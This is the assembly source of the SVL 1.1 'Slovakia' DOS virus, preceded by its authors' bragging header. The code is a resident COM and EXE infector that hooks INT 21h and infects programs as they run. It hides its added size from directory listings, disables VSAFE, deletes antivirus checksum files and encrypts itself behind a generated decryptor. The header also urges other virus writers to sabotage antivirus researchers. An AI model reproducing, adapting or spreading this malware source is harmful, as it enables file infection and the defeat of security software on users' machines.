;*********************************************************************** ;***** BEFORE READING THE SOURCE OR COMPILING , READ THIS !!! ********** ;*********************************************************************** ; THIS VIRUS WAS WRITTEN IN 12/93 - 1/94 SO DON'T BE SUPRISED, IF IT'S ; DETECTED BY ALL OF THE BETTER AV-PROGRAMS. THE SVL 1.x FAMILY OF VIRUSES ; WERE ( AND STILL ARE ) IN THE WILD. VX HAS A GOOD POLYMORPHIC ENGINE , ; SIMPLE SEMI-STEALTH, BUT IS RATHER POORLY OPTIMISED :( ; NAME : SVL 1.1 ; FAMILY MEMBERS : SVL 1.0 ; SVL 1.1 ... was the bugfix for 1.0 ; SVL 1.2 ... i can't remember what was new here ; SVL.KILL ... this isn't our work, this version ; rewrites sectors of HD at random ; ALIASES : SlovakiaII , New_Slovakia ; AUTHORS : JX , proffesor , mengele - members of SVL ; ORIGIN : .sk aka Slovakia aka Slovak republic ; RELEASED : Jan , 1994 ; REFERENCES : AVPVE links this virus as SlovakiaII to the Slovak family. ; That's wrong, of course :) . Another AVPVE mistake is ; saying that virus contains strings like 'SlovakiaII.3584a' ; and 'SlovakiaII.3584b' . I am sure there are no such ; strings in the sources . It looks like somebody tried to ; recompile sources which we released to our friends. ; TYPE : - resident COM & EXE infector ; - infection on exe ; - int 21 hooked ; - semi-stealth ; - prints fake message ; REMOVAL METHODS : various , e.g. formating HD, but our choice is ; to ftp to ftp.elf.stuba.sk /pub/pc/sac/svl.zip , ; where u can get a nice remover. ; POSTDISCOVERY HISTORY : after beeing in the wild for 11 months, we ; decided to show our goodwill to the AV-boyz ; and send them sources, but as they ; should have work very hard for their money, ; they got no disc or e-mail with the source. They ; got the sources printed on paper . :))))) ; Just imagine the situation : u have to re-type ; 30 pages. I think they were very happy ! ; I wish I could have seen their faces as they opened ; our special 'delivery'. We also added a letter ; which can u find in VLAD#4 in article called ; Slovakia by Qark. ; WE STRONGLY RECCOMEND THE STRATEGY DESCRIBED ABOVE FOR DRIVING SOME VIRUS ; RESEARCHERS MAD. IF YOUR VIRUS HAS HUGE SOURCES, TRY IT. TRY TO INCLUDE ; SOME BUGS IN SUCH SPECIAL SOURCES. MAKE THE AV TYPE IT !!! ; THEY'LL BE HAPPY !!! ; Gretings to : VYVOJAR , _COKE_ , SEPULTURA , KDKD , TUIR , MMIR , MJunkie ; DARKMAN , QARK , METABOLIS , VLAD , IR and all from #v ; and to our favourite FRED FLINTSTONE ; special greetings to PFC fredey - army is cool , or isn't it ? :))) ; / now u have time to code this promised 'super perfect mega virus ' / ; Tymto specialne pozdravujem Mira Trnku a prajem mu,aby mu rubrika vydrzala ; az do dochodkoveho veku . Stava sa na Slovensku pomaly kultovou postavou a ; zopar ludi mu asi chce vytvorit fanklub . Prosim pana Hubinskeho aby na - ; tychto par viet M.T upozornil ... he - he - he ; /MSG Blesk gimme know where're u , or mail us . ; As information should be free , we'll welcome all kind of them ... ; Do not allow the net censorship !!! ; JX/SVL MGL / SVL proffesor/SVL and freshman blesk/SVL ; P.S : Don't PaniX !!!!!!!!!!!!!!!!!!! ; ;------------------------- cut here --------------------------------------- .model tiny .286 .code mov ah,9h ; Carrier file push cs pop ds mov dx,offset LLL1 int 21h mov ah,4ch int 21h LLL1: db "I$" ;*************************************************************************** DECST: mov ax,1h ;Decryptor mov bx,20h DEC1: mov cx,0000h xor word ptr cs:[bx+0],cx inc bx inc bx dec ax jnz DEC1 ;*************************************************************************** START: mov si,0020h ; Flexible entry point mov di,si ; SI holds offset of START. add di,13h push ds ; Store segments push es push cs ;DS=CS. pop ds jmp TRACE1 AAAY: mov byte ptr ds:[di],0h AAAX: jmp INST1 ;--------------------------------- mov ah,4ch int 21h ;--------------------------------- INST1: mov ah,04h ; Display message on screen (1-4.8) int 1ah cmp dh,01h jnz INST2 cmp dl,3h jnc INST2 mov dx,si add dx,offset INSTTXT1-offset START mov ah,09h int 21h mov ah,01h ; Clear cursor mov ch,20h int 10h mov ah,86h ; wait for a while mov cx,0020h mov dx,0fffh int 15h INST2: ;--------------------------------- cmp byte ptr ds:[si+TYPFILE-START],2h ; COM or EXE file ? jnz INST2C ;--------------------------------- mov ax,es ; calculate segment for EXE file add ax,10h push ax NNCS: add ax,0000h ; add REL_CS, from original EXE header. mov word ptr ds:[si+JMPCS-START],ax ; prepare jump to original pop ax ; entry point NNSS: add ax,0000h ; add REL_SS, from original EXE header. mov word ptr ds:[si+INSTSS-START+1h],ax ;restore STACK segment jmp INSTZV ;--------------------------------- INST2C: mov ax,cs mov word ptr ds:[si+JMPCS-START],ax mov word ptr ds:[si+JMPIP-START],100h push si cld mov cx,3h mov di,100h add si,offset ZACCOM-START rep movsb pop si ;--------------------------------- INSTZV: mov ah,30h ; get DOS version int 21h cmp al,4h ; we dont go resitent jnc INST4 ; if dos version is bellow 4.0 jmp INSTEND ;--------------------------------- INST4: mov cx,4321h mov ah,54h ; Instalation check int 21h cmp bx,0EEE1h jnz INST5 jmp INSTEND ;--------------------------------- INST5: mov ax,es ;Test if program MCB is last dec ax mov es,ax cmp byte ptr es:[0000h],5ah jz INST6 jmp INSTEND ;--------------------------------- INST6: mov bx,word ptr es:[0003h] ; calculate where we place virus sub bx,100h ; from MCB. mov dx,es add dx,bx inc dx ;--------------------------------- mov ax,cs ; do we have enough memory ? cmp byte ptr ds:[si+TYPFILE-START],2h ; COM or EXE file. jnz INST7 add ax,0101h ; add our size in para +1. NNMIN: add ax,0000h ; add MINMEM from EXE-FILE header jmp INST8 INST7: add ax,1000h INST8: cmp dx,ax jc INSTEND ;--------------------------------- mov word ptr es:[0003h],bx ; cut MCB by 4kB. mov ax,es inc ax mov es,ax mov ax,word ptr es:[0002h] sub ax,100h mov word ptr es:[0002h],ax ;--------------------------------- push si ; move body to the top of memory in VIRSEG. mov cx,0e00h push cs pop ds mov es,dx ; ES holds VIRSEG. xor di,di rep movsb pop si ;--------------------------------- xor ax,ax mov ds,ax sub word ptr ds:[413h],4h ;subtract BIOSMEMSIZE by 4.. mov ax,word ptr ds:[21h*4h] ;hook INT 21h mov word ptr es:[HPVECT21-START],ax mov ax,word ptr ds:[21h*4h+2h] mov word ptr es:[HPVECT21-START+2h],ax mov ax,es cli mov word ptr ds:[21h*4h],offset SIZESTE-START mov word ptr ds:[21h*4h+2h],ax sti ;--------------------------------- INSTEND: xor ax,ax ;prepare register for exec. xor bx,bx xor cx,cx xor dx,dx xor bp,bp xor di,di cmp byte ptr cs:[si+TYPFILE-START],2h ;COM or EXE file. jnz INSTENDC ;--------------------------------- xor si,si pop es pop ds sahf cli INSTSP: mov sp,0000h ;Set original stack. INSTSS: mov ax,0000h ;for EXE file. mov ss,ax sti xor ax,ax JMINS: db 0eah ;Leave virus loader. JMPIP: db 00h db 00h JMPCS: db 00h db 00h ;-------------------------------- INSTENDC:xor si,si ; start original COM file. pop es ; restore segments pointing to PSP. pop ds sahf ; clear FLAGs. jmp JMINS ; and exit from here ;-------------------------------- HPVECT21:dw 0h ;INT 21h dw 0h INSTTXT1:db 0dh,0ah,"I'am SLOVAKIA virus Version 1.2 Copyright" db " (c) 1994 SVL",0dh,0ah,"$" TYPFILE: db 2h ;Typ s£b. ktor˜ nesie v¡r. (0-povel. preklada‡,1-COM,2-EXE.) ZACCOM: db 0h,0h,0h ;Data na za‡iatku p“v. COM s£b. ;**************************************************************************** REGDX: dw 0h ; offseyt of path to file (fn. EXEC). REGDS: dw 0h ; segment of path to file (fn. EXEC). NUMBDSK: db 0h ; drive number IDFILE: db 0h ; file indentifier (0,1-COM,2-EXE). PARAMVS: db 0h ; VSAFE parameters AKTHNDL: dw 0h ; handle of opened file TIMEHP: dw 0h ; here we store time DATEHP: dw 0h ; date of victim TABHEAD: db 1ch dup(0) ;where exe file header 'll be SIZESEG: dw 0h ; filesize (DX*65536)+AX. SIZEOFF: dw 0h ; AX ATR: dw 0h ; attributes DTX1: db "chklist.ms ",0h DTX2: db "chklist.cps",0h DTX3: db "smartchk.cps",0h DTX4: db "svl.svl",0h ASIZEVIR:dw 0h ; counter for write CODETP: db 0h ; type of decryption NCDX: dw 0h ; decryption key STEASZAX:dw 0h ; file size STEASZDX:dw 0h ; file size ;rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr SIZESTE: pushf ; Start of resident part ;-------------------------- pusha mov bp,sp mov ax,word ptr ss:[bp+22d] test ax,0000001000000000b jz OBNIF mov bh,0fbh jmp OBNIF1 OBNIF: mov bh,0fah OBNIF1: mov byte ptr cs:[FLEG1-START],bh mov byte ptr cs:[FLEG2-START],bh mov byte ptr cs:[FLEG3-START],bh mov byte ptr cs:[FLEG4-START],bh popa ;-------------------------- cmp ah,4eh jz SI1ST cmp ah,4fh jnz SIA ;------------------------------------------------------------------------- SI1ST: popf ;handle int 21h FIND 1st FILE, FIND nxt FILE pushf ;via handle( fn. 4e, 4f. ) call dword ptr cs:[HPVECT21-START] pushf pusha push es jc SI1STE ;------------------------- mov ah,2fh ;INT 21h fn. 2fh GET DTA. pushf call dword ptr cs:[HPVECT21-START] mov ax,word ptr es:[bx+18h] shr ax,9h ; AX holds year cmp ax,64h ; is infected ? jc SI1STE ;-------------------------- mov ax,0e00h ; sizefile-ax. sub word ptr es:[bx+1ah],ax ; jnc SI1ST2 ; hide virus ... dec word ptr es:[bx+1ah+2h] SI1ST2: jmp SI1STE ;-------------------------- SI1STE: pop es popa popf FLEG1: sti retf 02 ;------------------------------------------------------------------------- SIA: cmp ah,11h jz SIFC cmp ah,12h jnz SIEND ;------------------------------------------------------------------------- SIFC: popf ; handle INT 21h, FN 11H, 12h FND FILE FCB pushf call dword ptr cs:[HPVECT21-START] pushf pusha push es cmp al,0h jnz SIFCE ; error ! ;----------------------- mov ah,2fh ; get DTA. pushf call dword ptr cs:[HPVECT21-START] cmp byte ptr es:[bx],0ffh ;is FCB extended ? jz SIFC1 ;----------------------- SIFC3: mov ax,word ptr es:[bx+19h] ; is date changed ? shr ax,9h ; Normal FCB. cmp ax,64h jc SIFCE mov ax,0e00h ; hide virus sub word ptr es:[bx+1dh],ax jnc SIFC2 ; cut size by ax bytes dec word ptr es:[bx+1dh+2h] SIFC2: jmp SIFCE ;----------------------- SIFC1: add bx,7h ; FCB is extended , skip garbage jmp SIFC3 ;----------------------- SIFCE: pop es popa popf FLEG2: sti retf 02 ;------------------------------------------------------------------------- SIEND: cmp ah,54h ; instalation check jnz SIEND1 cmp cx,4321h jnz SIEND1 popf pushf call dword ptr cs:[HPVECT21-START] mov bx,0eee1h FLEG3: sti retf 02 ;------------------------------------------------------------------------- ;------------------------------------------------------------------------- SIEND1: cmp ah,4bh ; fn EXEC. jz ZAV0 ; here we infect files jmp SIEND2 ZAV0: cmp al,00h jz ZAV1 jmp SIEND2 ;--------------------- ZAV1: pusha push ds push es ;--------------------- mov word ptr cs:[REGDX-START],dx ; store path to file mov word ptr cs:[REGDS-START],ds ; (fn. EXEC) ;------------------------------------------------------------------------- mov bx,dx ; test , what drive is it push ds ; we infects only local HDs. push dx mov dl,byte ptr ds:[bx] mov dh,byte ptr ds:[bx+1h] cmp dh,3ah ; contains path drive letter ? (d:) jz ZAV2 ;--------------------- mov ah,19h ; get current drive pushf call dword ptr cs:[HPVECT21-START] inc al mov dl,al jmp ZAV4 ;--------------------- ZAV2: cmp dl,60h ; calculate drive number from ASCII jnc ZAV3 sub dl,40h jmp ZAV4 ZAV3: sub dl,60h ;--------------------- ZAV4: mov byte ptr cs:[NUMBDSK-START],dl ; store drive number mov ah,1ch ; HD or FD ? pushf call dword ptr cs:[HPVECT21-START] cmp al,0ffh ; error ? jz ZAV444 cmp byte ptr ds:[bx],0f8h ;Test ID byte of disk FAT (F8-HD). jnz ZAV444 ;--------------------- mov bl,byte ptr cs:[NUMBDSK-START] ; is drive local ? mov ax,4409h pushf call dword ptr cs:[HPVECT21-START] jc ZAV444 test dx,1000h jnz ZAV444 ;--------------------- stc ;Disk is ok :) jmp ZAV444E ;--------------------- ZAV444: clc ; wrong drive :( ZAV444E: pop dx pop ds ;------------------------------------------------------------------------- jc ZAV5 jmp ZAVE ;--------------------- ZAV5: mov ah,62h ; test if actual process is AV pushf call dword ptr cs:[HPVECT21-START] dec bx push ds mov ds,bx mov si,08h call FINDSTR pop ds jnc ZAV6 jmp ZAVE ;--------------------- ZAV6: call CHKASCIIZ ;Test if file (path ds:dx) is COM or EXE jnc ZAV7 ; and if is AV or not jmp ZAVE ZAV7: jz ZAV8 ; set indentificator for actual file mov byte ptr cs:[IDFILE-START],1h jmp ZAV9 ZAV8: mov byte ptr cs:[IDFILE-START],2h ;--------------------- ZAV9: push ds ; fuck VSAFE (Msdos 6.0). push dx mov ax,0fa02h mov dx,5945h mov bl,0h int 21h mov byte ptr cs:[PARAMVS-START],cl pop dx pop ds ;--------------------- mov ax,4300h ; getfile attribs pushf call dword ptr cs:[HPVECT21-START] jnc ZAV9A jmp ZAVEVSF ZAV9A: mov word ptr cs:[ATR-START],cx ;--------------------- mov ax,3d00h ;open file (Read only). just check it pushf call dword ptr cs:[HPVECT21-START] jnc ZAV10 jmp ZAVEVSF ;--------------------- ZAV10: mov bx,ax ; get date mov word ptr cs:[AKTHNDL-START],bx mov ax,5700h pushf call dword ptr cs:[HPVECT21-START] jnc ZAV11 jmp ZAVECHNDL ZAV11: mov word ptr cs:[TIMEHP-START],cx ;and store date & time. mov word ptr cs:[DATEHP-START],dx shr dx,9h ; is file infected (date is +100 years ). cmp dx,64h jc ZAV12 jmp ZAVECHNDL ;--------------------- ZAV12: mov ah,3fh ;get 1Ch bytes from file start push cs pop ds mov cx,1ch mov dx,offset TABHEAD-START pushf call dword ptr ds:[HPVECT21-START] jnc ZAV13 jmp ZAVECHNDL ;--------------------- ZAV13: mov ax,4202h ; get lenght xor cx,cx xor dx,dx pushf call dword ptr ds:[HPVECT21-START] jnc ZAV14 jmp ZAVECHNDL ;---------------------- ZAV14: mov word ptr ds:[SIZESEG-START],dx ; store lenght mov word ptr ds:[SIZEOFF-START],ax cmp dx,0h ; isn't file too short ? jnz ZAV15 cmp ax,400h jnc ZAV15 jmp ZAVECHNDL ZAV15: cmp byte ptr ds:[IDFILE-START],2h ; or too long ? jz ZAV17 cmp ax,0eff0h ; COM size check jc ZAV18 jmp ZAVECHNDL ZAV17: cmp dx,7h ; EXE size check jc ZAV16 jmp ZAVECHNDL ZAV16: push bx push ax mov cx,dx ; match EXE file size in header with mov ax,80h ; real size ? xor dx,dx mul cx mov bx,ax pop ax mov cx,200h xor dx,dx div word ptr cx xor dx,0h jz ZAV16A inc ax ZAV16A: add ax,bx cmp word ptr ds:[TABHEAD-START+4h],ax pop bx jz ZAV18 jmp ZAVECHNDL ;--------------------- ZAV18: cmp byte ptr ds:[IDFILE-START],2h ; is EXE file for jnz ZAV19 ; macrosoft fensters ? (MSWIN) mov si,offset TABHEAD-START cmp word ptr ds:[si+18h],40h jc ZAV19 jmp ZAVECHNDL ;--------------------- ZAV19: mov ah,3eh ; close file pushf call dword ptr ds:[HPVECT21-START] jnc ZAV20 jmp ZAVECHNDL ;---------------------------------------------------------------------- ZAV20: call ANLPATH ; delete unfriendly files (CPAV,MSAV). push cs ;chklist.ms . pop ds mov di,si mov si,offset DTX1-START mov cx,0fh rep movsb call ZAV20PRC ;--------------------- call ANLPATH push cs ;chklist.cps pop ds mov di,si mov si,offset DTX2-START mov cx,0fh rep movsb call ZAV20PRC ;--------------------- call ANLPATH ;smartchk.cps. push cs pop ds mov di,si mov si,offset DTX3-START mov cx,0fh rep movsb call ZAV20PRC jmp ZAV21 ;--------------------- ZAV20PRC: mov ah,41h ; i love this function mov dx,0e00h pushf call dword ptr cs:[HPVECT21-START] ret ;---------------------------------------------------------------------- ;---------------------------------------------------------------------- ZAV21: mov ds,word ptr cs:[REGDS-START] ; normal attribs mov dx,word ptr cs:[REGDX-START] mov ax,4301h mov cx,0h pushf call dword ptr cs:[HPVECT21-START] jnc ZAV22 jmp ZAVEVSF ;--------------------- ZAV22: call ANLPATH ; rename exe,com FILE to push cs ;SVL.svl pop ds mov di,si mov si,offset DTX4-START mov cx,0fh rep movsb mov ds,word ptr cs:[REGDS-START] mov di,0e00h mov ah,56h pushf call dword ptr cs:[HPVECT21-START] jnc ZAV23 jmp ZAVEVSF ;--------------------- ZAV23: push cs ; open file R/w pop ds mov dx,0e00h mov ax,3d02h pushf call dword ptr cs:[HPVECT21-START] jnc ZAV24 jmp ZAVRENM ;--------------------- ZAV24: mov bx,ax mov word ptr cs:[AKTHNDL-START],bx push cs pop ds mov ah,byte ptr ds:[IDFILE-START] ; get indentifier mov byte ptr ds:[TYPFILE-START],ah cmp byte ptr ds:[IDFILE-START],2h ; COM or EXE file. jz ZAV24XX jmp ZAV25 ;--------------------- ZAV24XX: mov ax,word ptr ds:[TABHEAD+14h-START] ; save IP. mov word ptr ds:[JMPIP-START],ax mov ax,word ptr ds:[TABHEAD+16h-START] ; save CS. mov word ptr ds:[NNCS+1h-START],ax mov ax,word ptr ds:[TABHEAD+10h-START] ; save SP. mov word ptr ds:[INSTSP+1h-START],ax mov ax,word ptr ds:[TABHEAD+0eh-START] ; save SS. mov word ptr ds:[NNSS+1h-START],ax ;--------------------- mov cx,word ptr ds:[TABHEAD+8h-START] ; calculate new REL_CS,IP. shl cx,4h ; CX= header size mov ax,word ptr ds:[SIZEOFF-START] ; file size mov dx,word ptr ds:[SIZESEG-START] cmp ax,cx jz ZAV25B jnc ZAV25C sub cx,ax mov ax,0ffffh sub ax,cx inc ax dec dx jmp ZAV25E ZAV25B: xor ax,ax jmp ZAV25E ZAV25C: sub ax,cx ;--------------------- ZAV25E: push ax ; ax+dx*(65536) is EXE size mov cx,dx ; get REL_CS,IP. xor dx,dx mov ax,1000h mul cx mov bx,ax pop ax xor dx,dx mov cx,10h div word ptr cx add ax,bx ;--------------------- mov word ptr ds:[TABHEAD+16h-START],ax ; EXE header new REL_CS. mov word ptr ds:[TABHEAD+0eh-START],ax ; header new REL_SS. mov word ptr ds:[TABHEAD+14h-START],dx ; header new IP. mov word ptr ds:[TABHEAD+10h-START],1200h ; new SP. ;--------------------- mov ax,word ptr ds:[TABHEAD+0ah-START] ; handle MINMEM a MAXMEM. add ax,70h mov word ptr ds:[TABHEAD+0ah-START],ax mov word ptr ds:[TABHEAD+0ch-START],0ffffh ;--------------------- ZAV25K: mov word ptr ds:[NNMIN+1h-START],ax mov word ptr ds:[TABHEAD+12h-START],0h ; clear checksum mov ax,word ptr ds:[TABHEAD+4h-START] ; add virus size add ax,7h ; in pages mov word ptr ds:[TABHEAD+4h-START],ax jmp ZAV26 ;--------------------- ZAV25: mov cx,3h ; store first 3 bytes from COM mov si,offset TABHEAD-START push cs pop es mov di,offset ZACCOM-START rep movsb mov ax,word ptr ds:[SIZEOFF-START] ; jump parametes push ax add ax,100h mov dx,ax pop ax sub ax,3h mov byte ptr ds:[TABHEAD-START],0e9h mov word ptr ds:[TABHEAD+1h-START],ax ;--------------------- ZAV26: mov ax,dx ; generate decryptor mov cx,1600d push dx mov dx,0e00h call MDEVICE pop dx mov byte ptr ds:[CODETP-START],bh ; decryption type mov word ptr ds:[ASIZEVIR-START],ax ; write counter mov word ptr ds:[NCDX-START],cx ; key add dx,ax mov word ptr ds:[START+1h-START],dx ; FLEXIBLE ENTRY point. mov byte ptr ds:[AAAX+1h-START],04h ;--------------------- push ax mov bx,word ptr ds:[AKTHNDL-START] mov ax,4202h ; lseek end xor cx,cx xor dx,dx pushf call dword ptr ds:[HPVECT21-START] pop cx jnc OPKOD jmp ZAVENW ;--------------------- OPKOD: mov ah,40h ;WRITE decryptor mov dx,0e00h pushf call dword ptr ds:[HPVECT21-START] jnc OPKOD1 jmp ZAVENW ;--------------------- OPKOD1: xor cx,cx ; encrypt body and appent it to end mov dx,3200d ; size of body xor si,si mov di,0e00h ;--------------------- ZAV27S: mov ax,word ptr ds:[si] cmp byte ptr ds:[CODETP-START],1h jz ZAV28 jnc ZAV27 xor ax,word ptr ds:[NCDX-START] ;XOR jmp ZAV29 ZAV27: add ax,word ptr ds:[NCDX-START] ;SUB jmp ZAV29 ZAV28: sub ax,word ptr ds:[NCDX-START] ;ADD ;--------------------- ZAV29: mov word ptr ds:[di],ax sub dx,2h add word ptr ds:[ASIZEVIR-START],2h add di,2h add si,2h add cx,2h cmp dx,0h jnz ZAV29AX jmp ZAV29AY ZAV29AX: cmp cx,200h jnz ZAV27S ;--------------------- ZAV29AY: push dx mov ah,40h ; write to file mov dx,0e00h pushf call dword ptr ds:[HPVECT21-START] pop dx jc ZAVENW cmp dx,0h jz ZAV30 mov di,0e00h mov cx,0h jmp ZAV27S ;--------------------- ZAV30: push ds ; generate additional bytes push bx mov ah,0h int 1ah cmp dx,0feffh jc ZAV30TY mov dx,0feffh ZAV30TY: mov si,dx mov ax,0h mov ds,ax mov di,0e00h mov cx,200h rep movsb pop bx pop ds mov cx,0e00h ; padd virus to 3,5 kB. sub cx,word ptr ds:[ASIZEVIR-START] mov dx,0e00h mov ah,40h pushf call dword ptr ds:[HPVECT21-START] jc ZAVENW ;--------------------- mov ax,4200h ; lseek start 0 xor cx,cx xor dx,dx ; 2 years ago we didn't use cwd :) pushf call dword ptr ds:[HPVECT21-START] jc ZAVENW ;--------------------- ;Write 1c bytes to file start mov ah,40h mov cx,1ch mov dx,offset TABHEAD-START pushf call dword ptr ds:[HPVECT21-START] jc ZAVENW ;--------------------- mov cx,word ptr ds:[TIMEHP-START] ; mark DATE = DATE +100 years mov dx,word ptr ds:[DATEHP-START] push dx shr dx,9h add dx,64h shl dx,9h pop ax and ax,0000000111111111b or dx,ax mov ax,5701h pushf call dword ptr ds:[HPVECT21-START] jc ZAVENW ;--------------------- ZAVENW: mov ah,3eh ;Close handle. mov bx,word ptr cs:[AKTHNDL-START] pushf call dword ptr cs:[HPVECT21-START] ;--------------------- ZAVRENM: call ANLPATH ; rename SVL.svl back to original push cs pop ds mov di,si mov si,offset DTX4-START mov cx,0fh rep movsb mov dx,0e00h mov di,word ptr cs:[REGDX-START] mov es,word ptr cs:[REGDS-START] mov ah,56h pushf call dword ptr cs:[HPVECT21-START] ;--------------------- push es ; restore attribs pop ds push di pop dx mov ax,4301h mov cx,word ptr cs:[ATR-START] pushf call dword ptr cs:[HPVECT21-START] jmp ZAVEVSF ;----------------------------------------------------------------------- ;----------------------------------------------------------------------- ZAVECHNDL:mov ah,3eh mov bx,word ptr cs:[AKTHNDL-START] pushf call dword ptr cs:[HPVECT21-START] ;--------------------- ZAVEVSF: mov dx,5945h ; restore VSAFE. mov ax,0fa02h mov bl,byte ptr cs:[PARAMVS-START] int 21h ZAVE: pop es pop ds popa jmp SIENDCE ;------------------------------------------------------------------------- ;------------------------------------------------------------------------- SIEND2: cmp ax,4202h ;fn. LSEEK jz LLLH ; want they file size or what ? jmp SIENDCE LLLH: cmp cx,0h jz LLLH1 jmp SIENDCE LLLH1: cmp dx,0h jz OOPR jmp SIENDCE ;--------------------- OOPR: popf pushf call dword ptr cs:[HPVECT21-START] jc SSSE pushf pusha push es push ds ;--------------------- mov word ptr cs:[STEASZAX-START],ax ; save file size mov word ptr cs:[STEASZDX-START],dx mov ax,5700h ; check date pushf call dword ptr cs:[HPVECT21-START] jc SSSRE shr dx,9h ; is file infected ? ( + 100 years). cmp dx,64h jc SSSRE ;--------------------- mov ah,62h ;Test for AV activity pushf call dword ptr cs:[HPVECT21-START] dec bx push ds mov ds,bx mov si,08h call FINDSTR pop ds jnc SSSRE ;--------------------- mov ax,word ptr cs:[STEASZAX-START] ; LSEEK end -3,5kB. mov dx,word ptr cs:[STEASZDX-START] cmp ax,0e00h jz SSS1 jc SSS3 sub ax,0e00h jmp SSS2 SSS3: dec dx mov cx,0ffffh mov bx,0e00h sub bx,ax sub cx,bx inc cx mov ax,cx jmp SSS2 SSS1: mov ax,0h SSS2: mov word ptr cs:[STEASZAX-START],ax mov word ptr cs:[STEASZDX-START],dx ;--------------------- SSSRE: pop ds pop es popa popf mov ax,word ptr cs:[STEASZAX-START] mov dx,word ptr cs:[STEASZDX-START] FLEG4: sti SSSE: retf 0002h ;------------------------------------------------------------------------- ;------------------------------------------------------------------------- SIENDCE: popf jmp dword ptr cs:[HPVECT21-START] ;------------------------------------------------------------------------- TRACE1: mov cx,10d TRACE2: dec cx jnz TRACE2 jmp AAAY ;*************************************************************************** include FINDSTR.inc include ANLPATH.inc include MDEVICE.inc include TXT.inc END